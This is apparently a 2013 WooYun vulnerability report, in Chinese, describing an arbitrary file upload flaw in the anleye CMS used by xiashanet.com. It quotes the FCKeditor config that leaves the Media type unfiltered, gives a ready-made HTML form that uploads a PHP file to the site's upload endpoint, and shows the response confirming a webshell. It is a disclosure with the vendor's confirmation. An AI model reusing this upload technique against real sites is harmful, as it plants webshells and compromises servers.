当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-023447

漏洞标题:杭州下沙网任意文件上传(第三方anleye程序),已shell

相关厂商:xiashanet.com

漏洞作者: x7iao

提交时间:2013-05-10 17:44

修复时间:2013-06-24 17:46

公开时间:2013-06-24 17:46

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-05-10: 细节已通知厂商并且等待厂商处理中
2013-05-11: 厂商已经确认,细节仅向厂商公开
2013-05-21: 细节向核心白帽子及相关领域专家公开
2013-05-31: 细节向普通白帽子公开
2013-06-10: 细节向实习白帽子公开
2013-06-24: 细节向公众公开

简要描述:

简简单单上传。

详细说明:

漏洞就在这里
fang.xiashanet.com
通过robots.txt可知这是anleye v2.0
就从网上下了一份源码
\upload\common\lib\FCKeditor\editor\filemanager\upload\php\config.php

$Config['ForceSingleExtension'] = true ;
$Config['AllowedExtensions']['File'] = array() ;
$Config['DeniedExtensions']['File'] = array('php','php2','php3','php4','php5','phtml','pwml','inc','asp','aspx','ascx','jsp','cfm','cfc','pl','bat','exe','com','dll','vbs','js','reg','cgi') ;
$Config['AllowedExtensions']['Image'] = array('jpg','gif','jpeg','png') ;
$Config['DeniedExtensions']['Image'] = array() ;
$Config['AllowedExtensions']['Flash'] = array('swf','fla') ;
$Config['DeniedExtensions']['Flash'] = array() ;


Media没有过滤啊有木有 果断构造上传

<form id="frmUpload" enctype="multipart/form-data"
action="http://fang.xiashanet.com/common/lib/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>


上传1.php

<script type="text/javascript">window.parent.OnUploadCompleted(201,"/data/fck/1.php","1.php", "") ;</script>


获取到了webshell

.jpg


漏洞证明:

.jpg

修复方案:

换个cms吧

版权声明:转载请注明来源 x7iao@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-05-11 11:01

厂商回复:

修复漏洞

最新状态:

暂无